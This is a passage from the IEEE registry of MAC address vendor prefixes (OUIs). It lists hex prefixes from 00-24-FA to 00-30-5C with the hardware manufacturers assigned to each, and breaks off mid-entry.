00-24-FA (hex) Hilger u. Kern GMBH 00-24-FB (hex) PRIVATE 00-24-FC (hex) QuoPin Co., Ltd. 00-24-FD (hex) Prosilient Technologies AB 00-24-FE (hex) AVM GmbH 00-24-FF (hex) QLogic Corporation 00-25-00 (hex) Apple, Inc 00-25-01 (hex) JSC "Supertel" 00-25-02 (hex) NaturalPoint 00-25-03 (hex) IBM Corp 00-25-04 (hex) Valiant Communications Limited 00-25-05 (hex) eks Engel GmbH & Co. KG 00-25-06 (hex) A.I. ANTITACCHEGGIO ITALIA SRL 00-25-07 (hex) ASTAK Inc. 00-25-08 (hex) Maquet Cardiopulmonary AG 00-25-09 (hex) SHARETRONIC Group LTD 00-25-0A (hex) Security Expert Co. Ltd 00-25-0B (hex) CENTROFACTOR INC 00-25-0C (hex) Enertrac 00-25-0D (hex) GZT Telkom-Telmor sp. z o.o. 00-25-0E (hex) gt german telematics gmbh 00-25-0F (hex) On-Ramp Wireless, Inc. 00-25-10 (hex) Pico-Tesla Magnetic Therapies 00-25-11 (hex) ELITEGROUP COMPUTER SYSTEM CO., LTD. 00-25-12 (hex) ZTE Corporation 00-25-13 (hex) CXP DIGITAL BV 00-25-14 (hex) PC Worth Int'l Co., Ltd. 00-25-15 (hex) SFR 00-25-16 (hex) Integrated Design Tools, Inc. 00-25-17 (hex) Venntis, LLC 00-25-18 (hex) Power PLUS Communications AG 00-25-19 (hex) Viaas Inc 00-25-1A (hex) Psiber Data Systems Inc. 00-25-1B (hex) Philips CareServant 00-25-1C (hex) EDT 00-25-1D (hex) DSA Encore, LLC 00-25-1E (hex) ROTEL TECHNOLOGIES 00-25-1F (hex) ZYNUS VISION INC. 00-25-20 (hex) SMA Railway Technology GmbH 00-25-21 (hex) Logitek Electronic Systems, Inc. 00-25-22 (hex) ASRock Incorporation 00-25-23 (hex) OCP Inc. 00-25-24 (hex) Lightcomm Technology Co., Ltd 00-25-25 (hex) CTERA Networks Ltd. 00-25-26 (hex) Genuine Technologies Co., Ltd. 00-25-27 (hex) Bitrode Corp. 00-25-28 (hex) Daido Signal Co., Ltd. 00-25-29 (hex) COMELIT GROUP S.P.A 00-25-2A (hex) Chengdu GeeYa Technology Co.,LTD 00-25-2B (hex) Stirling Energy Systems 00-25-2C (hex) Entourage Systems, Inc. 00-25-2D (hex) Kiryung Electronics 00-25-2E (hex) Cisco SPVTG 00-25-2F (hex) Energy, Inc. 00-25-30 (hex) Aetas Systems Inc. 00-25-31 (hex) Cloud Engines, Inc. 00-25-32 (hex) Digital Recorders 00-25-33 (hex) WITTENSTEIN AG 00-25-35 (hex) Minimax GmbH & Co KG 00-25-36 (hex) Oki Electric Industry Co., Ltd. 00-25-37 (hex) Runcom Technologies Ltd. 00-25-38 (hex) Samsung Electronics Co., Ltd., Memory Division 00-25-39 (hex) IfTA GmbH 00-25-3A (hex) CEVA, Ltd. 00-25-3B (hex) din Dietmar Nocker Facilitymanagement GmbH 00-25-3C (hex) 2Wire 00-25-3D (hex) DRS Consolidated Controls 00-25-3E (hex) Sensus Metering Systems 00-25-40 (hex) Quasar Technologies, Inc. 00-25-41 (hex) Maquet Critical Care AB 00-25-42 (hex) Pittasoft 00-25-43 (hex) MONEYTECH 00-25-44 (hex) LoJack Corporation 00-25-45 (hex) Cisco Systems 00-25-46 (hex) Cisco Systems 00-25-47 (hex) Nokia Danmark A/S 00-25-48 (hex) Nokia Danmark A/S 00-25-49 (hex) Jeorich Tech. Co.,Ltd. 00-25-4A (hex) RingCube Technologies, Inc. 00-25-4B (hex) Apple, Inc 00-25-4C (hex) Videon Central, Inc. 00-25-4D (hex) Singapore Technologies Electronics Limited 00-25-4E (hex) Vertex Wireless Co., Ltd. 00-25-4F (hex) ELETTROLAB Srl 00-25-50 (hex) Riverbed Technology 00-25-51 (hex) SE-Elektronic GmbH 00-25-52 (hex) VXI CORPORATION 00-25-53 (hex) PIRELLI BROADBAND SOLUTIONS 00-25-54 (hex) Pixel8 Networks 00-25-55 (hex) Visonic Technologies 1993 Ltd 00-25-56 (hex) Hon Hai Precision Ind. Co., Ltd. 00-25-57 (hex) Research In Motion 00-25-58 (hex) MPEDIA 00-25-59 (hex) Syphan Technologies Ltd 00-25-5A (hex) Tantalus Systems Corp. 00-25-5B (hex) CoachComm, LLC 00-25-5C (hex) NEC Corporation 00-25-5D (hex) Morningstar Corporation 00-25-5E (hex) Shanghai Dare Technologies Co.,Ltd. 00-25-5F (hex) SenTec AG 00-25-60 (hex) Ibridge Networks & Communications Ltd. 00-25-61 (hex) ProCurve Networking by HP 00-25-62 (hex) interbro Co. Ltd. 00-25-63 (hex) Luxtera Inc 00-25-64 (hex) Dell Inc. 00-25-65 (hex) Vizimax Inc. 00-25-66 (hex) Samsung Electronics Co.,Ltd 00-25-67 (hex) Samsung Electronics 00-25-68 (hex) Shenzhen Huawei Communication Technologies Co., Ltd 00-25-69 (hex) SAGEM COMMUNICATION 00-25-6A (hex) inIT - Institut Industrial IT 00-25-6B (hex) ATENIX E.E. s.r.l. 00-25-6C (hex) "Azimut" Production Association JSC 00-25-6D (hex) Broadband Forum 00-25-6E (hex) Van Breda B.V. 00-25-6F (hex) Dantherm Power 00-25-70 (hex) Eastern Communications Company Limited 00-25-71 (hex) Zhejiang Tianle Digital Electric Co.,Ltd 00-25-72 (hex) Nemo-Q International AB 00-25-73 (hex) ST Electronics (Info-Security) Pte Ltd 00-25-74 (hex) KUNIMI MEDIA DEVICE Co., Ltd. 00-25-75 (hex) FiberPlex Inc 00-25-76 (hex) NELI TECHNOLOGIES 00-25-77 (hex) D-BOX Technologies 00-25-78 (hex) JSC "Concern "Sozvezdie" 00-25-79 (hex) J & F Labs 00-25-7A (hex) CAMCO Produktions- und Vertriebs-GmbH für Beschallungs- und Beleuchtungsanlagen 00-25-7B (hex) STJ ELECTRONICS PVT LTD 00-25-7C (hex) Huachentel Technology Development Co., Ltd 00-25-7D (hex) PointRed Telecom Private Ltd. 00-25-7E (hex) NEW POS Technology Limited 00-25-7F (hex) CallTechSolution Co.,Ltd 00-25-80 (hex) Equipson S.A. 00-25-81 (hex) x-star networks Inc. 00-25-82 (hex) Maksat Technologies (P) Ltd 00-25-83 (hex) Cisco Systems 00-25-84 (hex) Cisco Systems 00-25-85 (hex) KOKUYO S&T Co., Ltd. 00-25-86 (hex) TP-LINK Technologies Co., Ltd. 00-25-87 (hex) Vitality, Inc. 00-25-88 (hex) Genie Industries, Inc. 00-25-89 (hex) Hills Industries Limited 00-25-8A (hex) Pole/Zero Corporation 00-25-8B (hex) Mellanox Technologies Ltd 00-25-8C (hex) ESUS ELEKTRONIK SAN. VE DIS. TIC. LTD. STI. 00-25-8D (hex) Haier 00-25-8E (hex) The Weather Channel 00-25-8F (hex) Trident Microsystems, Inc. 00-25-90 (hex) Super Micro Computer, Inc. 00-25-91 (hex) NEXTEK, Inc. 00-25-92 (hex) Guangzhou Shirui Electronic Co., Ltd 00-25-93 (hex) DatNet Informatikai Kft. 00-25-94 (hex) Eurodesign BG LTD 00-25-95 (hex) Northwest Signal Supply, Inc 00-25-96 (hex) GIGAVISION srl 00-25-97 (hex) Kalki Communication Technologies 00-25-98 (hex) Zhong Shan City Litai Electronic Industrial Co. Ltd 00-25-99 (hex) Hedon e.d. B.V. 00-25-9A (hex) CEStronics GmbH 00-25-9B (hex) Beijing PKUNITY Microsystems Technology Co., Ltd 00-25-9C (hex) Cisco-Linksys, LLC 00-25-9D (hex) PRIVATE 00-25-9E (hex) Huawei Technologies Co., Ltd. 00-25-9F (hex) TechnoDigital Technologies GmbH 00-25-A0 (hex) Nintendo Co., Ltd. 00-25-A1 (hex) Enalasys 00-25-A2 (hex) Alta Definicion LINCEO S.L. 00-25-A3 (hex) Trimax Wireless, Inc. 00-25-A4 (hex) EuroDesign embedded technologies GmbH 00-25-A5 (hex) Walnut Media Network 00-25-A6 (hex) Central Network Solution Co., Ltd. 00-25-A7 (hex) Comverge, Inc. 00-25-A8 (hex) Kontron (BeiJing) Technology Co.,Ltd 00-25-A9 (hex) Shanghai Embedway Information Technologies Co.,Ltd 00-25-AA (hex) Beijing Soul Technology Co.,Ltd. 00-25-AB (hex) AIO LCD PC BU / TPV 00-25-AC (hex) I-Tech corporation 00-25-AD (hex) Manufacturing Resources International 00-25-AE (hex) Microsoft Corporation 00-25-AF (hex) COMFILE Technology 00-25-B0 (hex) Schmartz Inc 00-25-B1 (hex) Maya-Creation Corporation 00-25-B2 (hex) LFK-Lenkflugkörpersysteme GmbH 00-25-B3 (hex) Hewlett-Packard Company 00-25-B4 (hex) Cisco Systems 00-25-B5 (hex) Cisco Systems 00-25-B6 (hex) Telecom FM 00-25-B7 (hex) Costar electronics, inc., 00-25-B8 (hex) Agile Communications, Inc. 00-25-B9 (hex) Agilink Systems Corp. 00-25-BA (hex) Alcatel-Lucent IPD 00-25-BB (hex) INNERINT Co., Ltd. 00-25-BC (hex) Apple, Inc 00-25-BD (hex) Italdata Ingegneria dell'Idea S.p.A. 00-25-BE (hex) Tektrap Systems Inc. 00-25-BF (hex) Wireless Cables Inc. 00-25-C0 (hex) ZillionTV Corporation 00-25-C1 (hex) Nawoo Korea Corp. 00-25-C2 (hex) RingBell Co.,Ltd. 00-25-C3 (hex) Nortel Networks 00-25-C4 (hex) Ruckus Wireless 00-25-C5 (hex) Star Link Communication Pvt. Ltd. 00-25-C6 (hex) kasercorp, ltd 00-25-C7 (hex) altek Corporation 00-25-C8 (hex) S-Access GmbH 00-25-C9 (hex) SHENZHEN HUAPU DIGITAL CO., LTD 00-25-CA (hex) LS Research, LLC 00-25-CB (hex) Reiner SCT 00-25-CC (hex) Mobile Communications Korea Incorporated 00-25-CD (hex) Skylane Optics 00-25-CE (hex) InnerSpace 00-25-CF (hex) Nokia Danmark A/S 00-25-D0 (hex) Nokia Danmark A/S 00-25-D1 (hex) Eastech Electronics (Taiwan) Inc. 00-25-D2 (hex) InpegVision Co., Ltd 00-25-D3 (hex) AzureWave Technologies, Inc 00-25-D4 (hex) Fortress Technologies 00-25-D5 (hex) Robonica (Pty) Ltd 00-25-D6 (hex) The Kroger Co. 00-25-D7 (hex) CEDO 00-25-D8 (hex) KOREA MAINTENANCE 00-25-D9 (hex) DataFab Systems Inc. 00-25-DA (hex) Secura Key 00-25-DB (hex) ATI Electronics(Shenzhen) Co., LTD 00-25-DC (hex) Sumitomo Electric Networks, Inc 00-25-DD (hex) SUNNYTEK INFORMATION CO., LTD. 00-25-DE (hex) Probits Co., LTD. 00-25-DF (hex) PRIVATE 00-25-E0 (hex) CeedTec Sdn Bhd 00-25-E1 (hex) SHANGHAI SEEYOO ELECTRONIC & TECHNOLOGY CO., LTD 00-25-E2 (hex) Everspring Industry Co., Ltd. 00-25-E3 (hex) Hanshinit Inc. 00-25-E4 (hex) OMNI-WiFi, LLC 00-25-E5 (hex) LG Electronics Inc 00-25-E6 (hex) Belgian Monitoring Systems bvba 00-25-E7 (hex) Sony Ericsson Mobile Communications 00-25-E8 (hex) Idaho Technology 00-25-E9 (hex) i-mate Development, Inc. 00-25-EA (hex) Iphion BV 00-25-EB (hex) Reutech Radar Systems (PTY) Ltd 00-25-EC (hex) Humanware 00-25-ED (hex) NuVo Technologies LLC 00-25-EE (hex) Avtex Ltd 00-25-EF (hex) I-TEC Co., Ltd. 00-25-F0 (hex) Suga Electronics Limited 00-25-F1 (hex) Motorola Mobility, Inc. 00-25-F2 (hex) Motorola Mobility, Inc. 00-25-F3 (hex) Nordwestdeutsche Zählerrevision 00-25-F4 (hex) KoCo Connector AG 00-25-F5 (hex) DVS Korea, Co., Ltd 00-25-F6 (hex) netTALK.com, Inc. 00-25-F7 (hex) Ansaldo STS USA 00-25-F9 (hex) GMK electronic design GmbH 00-25-FA (hex) J&M Analytik AG 00-25-FB (hex) Tunstall Healthcare A/S 00-25-FC (hex) ENDA ENDUSTRIYEL ELEKTRONIK LTD. STI. 00-25-FD (hex) OBR Centrum Techniki Morskiej S.A. 00-25-FE (hex) Pilot Electronics Corporation 00-25-FF (hex) CreNova Technology GmbH 00-26-00 (hex) TEAC Australia Pty Ltd. 00-26-01 (hex) Cutera Inc 00-26-02 (hex) SMART Temps LLC 00-26-03 (hex) Shenzhen Wistar Technology Co., Ltd 00-26-04 (hex) Audio Processing Technology Ltd 00-26-05 (hex) CC Systems AB 00-26-06 (hex) RAUMFELD GmbH 00-26-07 (hex) Enabling Technology Pty Ltd 00-26-08 (hex) Apple, Inc 00-26-09 (hex) Phyllis Co., Ltd. 00-26-0A (hex) Cisco Systems 00-26-0B (hex) Cisco Systems 00-26-0C (hex) Dataram 00-26-0D (hex) Micronetics, Inc. 00-26-0E (hex) Ablaze Systems, LLC 00-26-0F (hex) Linn Products Ltd 00-26-10 (hex) Apacewave Technologies 00-26-11 (hex) Licera AB 00-26-12 (hex) Space Exploration Technologies 00-26-13 (hex) Engel Axil S.L. 00-26-14 (hex) KTNF 00-26-15 (hex) Teracom Limited 00-26-16 (hex) Rosemount Inc. 00-26-17 (hex) OEM Worldwide 00-26-18 (hex) ASUSTek COMPUTER INC. 00-26-19 (hex) FRC 00-26-1A (hex) Femtocomm System Technology Corp. 00-26-1B (hex) LAUREL BANK MACHINES CO., LTD. 00-26-1C (hex) NEOVIA INC. 00-26-1D (hex) COP SECURITY SYSTEM CORP. 00-26-1E (hex) QINGBANG ELEC(SZ) CO., LTD 00-26-1F (hex) SAE Magnetics (H.K.) Ltd. 00-26-20 (hex) ISGUS GmbH 00-26-21 (hex) InteliCloud Technology Inc. 00-26-22 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. 00-26-23 (hex) JRD Communication Inc 00-26-24 (hex) Thomson Inc. 00-26-25 (hex) MediaSputnik 00-26-26 (hex) Geophysical Survey Systems, Inc. 00-26-27 (hex) Truesell 00-26-28 (hex) companytec automação e controle ltda 00-26-29 (hex) Juphoon System Software Inc. 00-26-2A (hex) Proxense, LLC 00-26-2B (hex) Wongs Electronics Co. Ltd. 00-26-2C (hex) IKT Advanced Technologies s.r.o. 00-26-2D (hex) Wistron Corporation 00-26-2E (hex) Chengdu Jiuzhou Electronic Technology Inc 00-26-2F (hex) HAMAMATSU TOA ELECTRONICS 00-26-30 (hex) ACOREL S.A.S 00-26-31 (hex) COMMTACT LTD 00-26-32 (hex) Instrumentation Technologies d.d. 00-26-33 (hex) MIR - Medical International Research 00-26-34 (hex) Infineta Systems, Inc 00-26-35 (hex) Bluetechnix GmbH 00-26-36 (hex) Motorola Mobility, Inc. 00-26-37 (hex) Samsung Electro-Mechanics 00-26-38 (hex) Xia Men Joyatech Co., Ltd. 00-26-39 (hex) T.M. Electronics, Inc. 00-26-3A (hex) Digitec Systems 00-26-3B (hex) Onbnetech 00-26-3C (hex) Bachmann GmbH & Co. KG 00-26-3D (hex) MIA Corporation 00-26-3E (hex) Trapeze Networks 00-26-3F (hex) LIOS Technology GmbH 00-26-40 (hex) Baustem Broadband Technologies, Ltd. 00-26-41 (hex) Motorola, Inc 00-26-42 (hex) Motorola, Inc 00-26-43 (hex) Alps Electric Co., Ltd 00-26-44 (hex) Thomson Telecom Belgium 00-26-45 (hex) Circontrol S.A. 00-26-46 (hex) SHENYANG TONGFANG MULTIMEDIA TECHNOLOGY COMPANY LIMITED 00-26-47 (hex) WFE TECHNOLOGY CORP. 00-26-48 (hex) Emitech Corp. 00-26-4A (hex) Apple, Inc 00-26-4C (hex) Shanghai DigiVision Technology Co., Ltd. 00-26-4D (hex) Arcadyan Technology Corporation 00-26-4E (hex) Rail & Road Protec GmbH 00-26-4F (hex) Krüger&Gothe GmbH 00-26-50 (hex) 2Wire 00-26-51 (hex) Cisco Systems 00-26-52 (hex) Cisco Systems 00-26-53 (hex) DaySequerra Corporation 00-26-54 (hex) 3Com Corporation 00-26-55 (hex) Hewlett-Packard Company 00-26-56 (hex) Sansonic Electronics USA 00-26-57 (hex) OOO NPP EKRA 00-26-58 (hex) T-Platforms (Cyprus) Limited 00-26-59 (hex) Nintendo Co., Ltd. 00-26-5A (hex) D-Link Corporation 00-26-5B (hex) Hitron Technologies. Inc 00-26-5C (hex) Hon Hai Precision Ind. Co.,Ltd. 00-26-5D (hex) Samsung Electronics 00-26-5E (hex) Hon Hai Precision Ind. Co.,Ltd. 00-26-5F (hex) Samsung Electronics Co.,Ltd 00-26-60 (hex) Logiways 00-26-61 (hex) Irumtek Co., Ltd. 00-26-62 (hex) Actiontec Electronics, Inc 00-26-63 (hex) Shenzhen Huitaiwei Tech. Ltd, co. 00-26-64 (hex) Core System Japan 00-26-65 (hex) ProtectedLogic Corporation 00-26-66 (hex) EFM Networks 00-26-67 (hex) CARECOM CO.,LTD. 00-26-68 (hex) Nokia Danmark A/S 00-26-69 (hex) Nokia Danmark A/S 00-26-6A (hex) ESSENSIUM NV 00-26-6B (hex) SHINE UNION ENTERPRISE LIMITED 00-26-6C (hex) Inventec 00-26-6D (hex) MobileAccess Networks 00-26-6E (hex) Nissho-denki Co.,LTD. 00-26-6F (hex) Coordiwise Technology Corp. 00-26-70 (hex) Cinch Connectors 00-26-71 (hex) AUTOVISION Co., Ltd 00-26-72 (hex) AAMP of America 00-26-73 (hex) RICOH COMPANY LTD. 00-26-74 (hex) Electronic Solutions, Inc. 00-26-75 (hex) Aztech Electronics Pte Ltd 00-26-76 (hex) COMMidt AS 00-26-77 (hex) DEIF A/S 00-26-78 (hex) Logic Instrument SA 00-26-79 (hex) Euphonic Technologies, Inc. 00-26-7A (hex) wuhan hongxin telecommunication technologies co.,ltd 00-26-7B (hex) GSI Helmholtzzentrum für Schwerionenforschung GmbH 00-26-7C (hex) Metz-Werke GmbH & Co KG 00-26-7D (hex) A-Max Technology Macao Commercial Offshore Company Limited 00-26-7E (hex) Parrot SA 00-26-7F (hex) Zenterio AB 00-26-80 (hex) Lockie Innovation Pty Ltd 00-26-81 (hex) Interspiro AB 00-26-82 (hex) Gemtek Technology Co., Ltd. 00-26-83 (hex) Ajoho Enterprise Co., Ltd. 00-26-84 (hex) KISAN SYSTEM 00-26-85 (hex) Digital Innovation 00-26-86 (hex) Quantenna Communcations, Inc. 00-26-87 (hex) ALLIED TELESIS, K.K corega division. 00-26-88 (hex) Juniper Networks 00-26-89 (hex) General Dynamics Robotic Systems 00-26-8A (hex) Terrier SC Ltd 00-26-8B (hex) Guangzhou Escene Computer Technology Limited 00-26-8C (hex) StarLeaf Ltd. 00-26-8D (hex) CellTel S.p.A. 00-26-8E (hex) Alta Solutions, Inc. 00-26-8F (hex) MTA SpA 00-26-90 (hex) I DO IT 00-26-91 (hex) SAGEM COMMUNICATION 00-26-92 (hex) Mitsubishi Electric Co. 00-26-93 (hex) QVidium Technologies, Inc. 00-26-94 (hex) Senscient Ltd 00-26-95 (hex) ZT Group Int'l Inc 00-26-96 (hex) NOOLIX Co., Ltd 00-26-97 (hex) Cheetah Technologies, L.P. 00-26-98 (hex) Cisco Systems 00-26-99 (hex) Cisco Systems 00-26-9A (hex) carina system co., ltd. 00-26-9B (hex) SOKRAT Ltd. 00-26-9C (hex) ITUS JAPAN CO. LTD 00-26-9D (hex) M2Mnet Co., Ltd. 00-26-9E (hex) Quanta Computer Inc 00-26-9F (hex) PRIVATE 00-26-A0 (hex) moblic 00-26-A1 (hex) Megger 00-26-A2 (hex) Instrumentation Technology Systems 00-26-A3 (hex) FQ Ingenieria Electronica S.A. 00-26-A4 (hex) Novus Produtos Eletronicos Ltda 00-26-A5 (hex) MICROROBOT.CO.,LTD 00-26-A6 (hex) TRIXELL 00-26-A7 (hex) CONNECT SRL 00-26-A8 (hex) DAEHAP HYPER-TECH 00-26-A9 (hex) Strong Technologies Pty Ltd 00-26-AA (hex) Kenmec Mechanical Engineering Co., Ltd. 00-26-AB (hex) SEIKO EPSON CORPORATION 00-26-AC (hex) Shanghai LUSTER Teraband photonic Co., Ltd. 00-26-AD (hex) Arada Systems, Inc. 00-26-AE (hex) Wireless Measurement Ltd 00-26-AF (hex) Duelco A/S 00-26-B0 (hex) Apple, Inc 00-26-B1 (hex) Navis Auto Motive Systems, Inc. 00-26-B2 (hex) Setrix AG 00-26-B3 (hex) Thales Communications Inc 00-26-B4 (hex) Ford Motor Company 00-26-B5 (hex) ICOMM Tele Ltd 00-26-B6 (hex) Askey Computer 00-26-B7 (hex) Kingston Technology Company, Inc. 00-26-B8 (hex) Actiontec Electronics, Inc 00-26-B9 (hex) Dell Inc 00-26-BA (hex) Motorola Mobility, Inc. 00-26-BB (hex) Apple, Inc 00-26-BC (hex) General Jack Technology Ltd. 00-26-BD (hex) JTEC Card & Communication Co., Ltd. 00-26-BE (hex) Schoonderbeek Elektronica Systemen B.V. 00-26-BF (hex) ShenZhen Temobi Science&Tech Development Co.,Ltd 00-26-C0 (hex) EnergyHub 00-26-C1 (hex) ARTRAY CO., LTD. 00-26-C2 (hex) SCDI Co. LTD 00-26-C3 (hex) Insightek Corp. 00-26-C4 (hex) Cadmos microsystems S.r.l. 00-26-C5 (hex) Guangdong Gosun Telecommunications Co.,Ltd 00-26-C6 (hex) Intel Corporate 00-26-C7 (hex) Intel Corporate 00-26-C8 (hex) System Sensor 00-26-C9 (hex) Proventix Systems, Inc. 00-26-CA (hex) Cisco Systems 00-26-CB (hex) Cisco Systems 00-26-CC (hex) Nokia Danmark A/S 00-26-CD (hex) PurpleComm, Inc. 00-26-CE (hex) Kozumi USA Corp. 00-26-CF (hex) DEKA R&D 00-26-D0 (hex) Semihalf 00-26-D1 (hex) S Squared Innovations Inc. 00-26-D2 (hex) Pcube Systems, Inc. 00-26-D3 (hex) Zeno Information System 00-26-D4 (hex) IRCA SpA 00-26-D5 (hex) Ory Solucoes em Comercio de Informatica Ltda. 00-26-D6 (hex) Ningbo Andy Optoelectronic Co., Ltd. 00-26-D7 (hex) Xiamen BB Electron & Technology Co., Ltd. 00-26-D8 (hex) Magic Point Inc. 00-26-D9 (hex) Pace plc 00-26-DA (hex) Universal Media Corporation /Slovakia/ s.r.o. 00-26-DB (hex) Ionics EMS Inc. 00-26-DC (hex) Optical Systems Design 00-26-DD (hex) Fival Corporation 00-26-DE (hex) FDI MATELEC 00-26-DF (hex) TaiDoc Technology Corp. 00-26-E0 (hex) ASITEQ 00-26-E1 (hex) Stanford University, OpenFlow Group 00-26-E2 (hex) LG Electronics 00-26-E3 (hex) DTI 00-26-E4 (hex) CANAL OVERSEAS 00-26-E5 (hex) AEG Power Solutions 00-26-E6 (hex) Visionhitech Co., Ltd. 00-26-E7 (hex) Shanghai ONLAN Communication Tech. Co., Ltd. 00-26-E8 (hex) Murata Manufacturing Co., Ltd. 00-26-E9 (hex) SP Corp 00-26-EA (hex) Cheerchip Electronic Technology (ShangHai) Co., Ltd. 00-26-EB (hex) Advanced Spectrum Technology Co., Ltd. 00-26-EC (hex) Legrand Home Systems, Inc 00-26-ED (hex) zte corporation 00-26-EE (hex) TKM GmbH 00-26-EF (hex) Technology Advancement Group, Inc. 00-26-F0 (hex) cTrixs International GmbH. 00-26-F1 (hex) ProCurve Networking by HP 00-26-F2 (hex) Netgear 00-26-F3 (hex) SMC Networks 00-26-F4 (hex) Nesslab 00-26-F5 (hex) XRPLUS Inc. 00-26-F6 (hex) Military Communication Institute 00-26-F7 (hex) Infosys Technologies Ltd. 00-26-F8 (hex) Golden Highway Industry Development Co., Ltd. 00-26-F9 (hex) S.E.M. srl 00-26-FA (hex) BandRich Inc. 00-26-FB (hex) AirDio Wireless, Inc. 00-26-FC (hex) AcSiP Technology Corp. 00-26-FD (hex) Interactive Intelligence 00-26-FE (hex) MKD Technology Inc. 00-26-FF (hex) Research In Motion 00-27-00 (hex) Shenzhen Siglent Technology Co., Ltd. 00-27-01 (hex) INCOstartec GmbH 00-27-02 (hex) SolarEdge Technologies 00-27-03 (hex) Testech Electronics Pte Ltd 00-27-04 (hex) Accelerated Concepts, LLC 00-27-05 (hex) Sectronic 00-27-06 (hex) YOISYS 00-27-07 (hex) Lift Complex DS, JSC 00-27-08 (hex) Nordiag ASA 00-27-09 (hex) Nintendo Co., Ltd. 00-27-0A (hex) IEE S.A. 00-27-0B (hex) Adura Technologies 00-27-0C (hex) Cisco Systems 00-27-0D (hex) Cisco Systems 00-27-0E (hex) Intel Corporate 00-27-0F (hex) Envisionnovation Inc 00-27-10 (hex) Intel Corporate 00-27-11 (hex) LanPro Inc 00-27-12 (hex) MaxVision LLC 00-27-13 (hex) Universal Global Scientific Industrial Co., Ltd. 00-27-14 (hex) Grainmustards, Co,ltd. 00-27-15 (hex) Rebound Telecom. Co., Ltd 00-27-16 (hex) Adachi-Syokai Co., Ltd. 00-27-17 (hex) CE Digital(Zhenjiang)Co.,Ltd 00-27-18 (hex) Suzhou NEW SEAUNION Video Technology Co.,Ltd 00-27-19 (hex) TP-LINK TECHNOLOGIES CO., LTD. 00-27-1A (hex) Geenovo Technology Ltd. 00-27-1B (hex) Alec Sicherheitssysteme GmbH 00-27-1C (hex) MERCURY CORPORATION 00-27-1D (hex) Comba Telecom Systems (China) Ltd. 00-27-1E (hex) Xagyl Communications 00-27-1F (hex) MIPRO Electronics Co., Ltd 00-27-20 (hex) NEW-SOL COM 00-27-21 (hex) Shenzhen Baoan Fenda Industrial Co., Ltd 00-27-22 (hex) Ubiquiti Networks 00-27-F8 (hex) Brocade Communications Systems, Inc 00-30-00 (hex) ALLWELL TECHNOLOGY CORP. 00-30-01 (hex) SMP 00-30-02 (hex) Expand Networks 00-30-03 (hex) Phasys Ltd. 00-30-04 (hex) LEADTEK RESEARCH INC. 00-30-05 (hex) Fujitsu Siemens Computers 00-30-06 (hex) SUPERPOWER COMPUTER 00-30-07 (hex) OPTI, INC. 00-30-08 (hex) AVIO DIGITAL, INC. 00-30-09 (hex) Tachion Networks, Inc. 00-30-0A (hex) AZTECH Electronics Pte Ltd 00-30-0B (hex) mPHASE Technologies, Inc. 00-30-0C (hex) CONGRUENCY, LTD. 00-30-0D (hex) MMC Technology, Inc. 00-30-0E (hex) Klotz Digital AG 00-30-0F (hex) IMT - Information Management T 00-30-10 (hex) VISIONETICS INTERNATIONAL 00-30-11 (hex) HMS Industrial Networks 00-30-12 (hex) DIGITAL ENGINEERING LTD. 00-30-13 (hex) NEC Corporation 00-30-14 (hex) DIVIO, INC. 00-30-15 (hex) CP CLARE CORP. 00-30-16 (hex) ISHIDA CO., LTD. 00-30-17 (hex) BlueArc UK Ltd 00-30-18 (hex) Jetway Information Co., Ltd. 00-30-19 (hex) CISCO SYSTEMS, INC. 00-30-1A (hex) SMARTBRIDGES PTE. LTD. 00-30-1B (hex) SHUTTLE, INC. 00-30-1C (hex) ALTVATER AIRDATA SYSTEMS 00-30-1D (hex) SKYSTREAM, INC. 00-30-1E (hex) 3COM Europe Ltd. 00-30-1F (hex) OPTICAL NETWORKS, INC. 00-30-20 (hex) TSI, Inc.. 00-30-21 (hex) HSING TECH. ENTERPRISE CO.,LTD 00-30-22 (hex) Fong Kai Industrial Co., Ltd. 00-30-23 (hex) COGENT COMPUTER SYSTEMS, INC. 00-30-24 (hex) CISCO SYSTEMS, INC. 00-30-25 (hex) CHECKOUT COMPUTER SYSTEMS, LTD 00-30-26 (hex) HeiTel Digital Video GmbH 00-30-27 (hex) KERBANGO, INC. 00-30-28 (hex) FASE Saldatura srl 00-30-29 (hex) OPICOM 00-30-2A (hex) SOUTHERN INFORMATION 00-30-2B (hex) INALP NETWORKS, INC. 00-30-2C (hex) SYLANTRO SYSTEMS CORPORATION 00-30-2D (hex) QUANTUM BRIDGE COMMUNICATIONS 00-30-2E (hex) Hoft & Wessel AG 00-30-2F (hex) GE Aviation System 00-30-30 (hex) HARMONIX CORPORATION 00-30-31 (hex) LIGHTWAVE COMMUNICATIONS, INC. 00-30-32 (hex) MagicRam, Inc. 00-30-33 (hex) ORIENT TELECOM CO., LTD. 00-30-34 (hex) SET ENGINEERING 00-30-35 (hex) Corning Incorporated M/S - SP-WW-01 00-30-36 (hex) RMP ELEKTRONIKSYSTEME GMBH 00-30-37 (hex) Packard Bell Nec Services 00-30-38 (hex) XCP, INC. 00-30-39 (hex) SOFTBOOK PRESS 00-30-3A (hex) MAATEL 00-30-3B (hex) PowerCom Technology 00-30-3C (hex) ONNTO CORP. 00-30-3D (hex) IVA CORPORATION 00-30-3E (hex) Radcom Ltd. 00-30-3F (hex) TurboComm Tech Inc. 00-30-40 (hex) CISCO SYSTEMS, INC. 00-30-41 (hex) SAEJIN T & M CO., LTD. 00-30-42 (hex) DeTeWe-Deutsche Telephonwerke 00-30-43 (hex) IDREAM TECHNOLOGIES, PTE. LTD. 00-30-44 (hex) CradlePoint, Inc 00-30-45 (hex) Village Networks, Inc. (VNI) 00-30-46 (hex) Controlled Electronic Manageme 00-30-47 (hex) NISSEI ELECTRIC CO., LTD. 00-30-48 (hex) Supermicro Computer, Inc. 00-30-49 (hex) BRYANT TECHNOLOGY, LTD. 00-30-4A (hex) Fraunhofer IPMS 00-30-4B (hex) ORBACOM SYSTEMS, INC. 00-30-4C (hex) APPIAN COMMUNICATIONS, INC. 00-30-4D (hex) ESI 00-30-4E (hex) BUSTEC PRODUCTION LTD. 00-30-4F (hex) PLANET Technology Corporation 00-30-50 (hex) Versa Technology 00-30-51 (hex) ORBIT AVIONIC & COMMUNICATION 00-30-52 (hex) ELASTIC NETWORKS 00-30-53 (hex) Basler AG 00-30-54 (hex) CASTLENET TECHNOLOGY, INC. 00-30-55 (hex) Renesas Technology America, Inc. 00-30-56 (hex) Beck IPC GmbH 00-30-57 (hex) QTelNet, Inc. 00-30-58 (hex) API MOTION 00-30-59 (hex) KONTRON COMPACT COMPUTERS AG 00-30-5A (hex) TELGEN CORPORATION 00-30-5B (hex) Toko Inc. 00-30-5C (hex) SMAR Laboratories Corp. 00-30-5D 